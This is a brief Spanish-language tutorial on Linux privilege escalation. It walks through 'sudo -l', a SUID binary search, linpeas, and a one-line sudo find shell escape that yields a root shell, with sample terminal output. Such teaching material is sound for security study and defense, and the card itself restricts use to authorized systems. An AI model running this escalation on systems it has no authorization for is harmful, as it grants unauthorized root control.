KALI
Escalada de privilegios
Ya entraste como usuario normal.
¿Ahora cómo llegas a root? Primero, sudo menos l: te dice qué puedes ejecutar como root sin contraseña, y ahí suele estar la puerta.
Luego busca binarios con SUID, que corren con los permisos de su dueño. linpeas automatiza toda la búsqueda de vías de escalada.
Y si find se puede correr con sudo, un solo comando te da una shell de root. La escalada casi siempre vive en una mala configuración.
# los comandos
kali@kali:~$ sudo -lcopiar(root) NOPASSWD: /usr/bin/find
kali@kali:~$ find / -perm -4000 -type f 2>/dev/nullcopiar/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/find
kali@kali:~$ ./linpeas.sh | grep -i 'possible'copiar[+] Possible sudo pwnage: find
kali@kali:~$ sudo find . -exec /bin/sh \; -quitcopiarsh-5.1# whoamicopiarroot
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.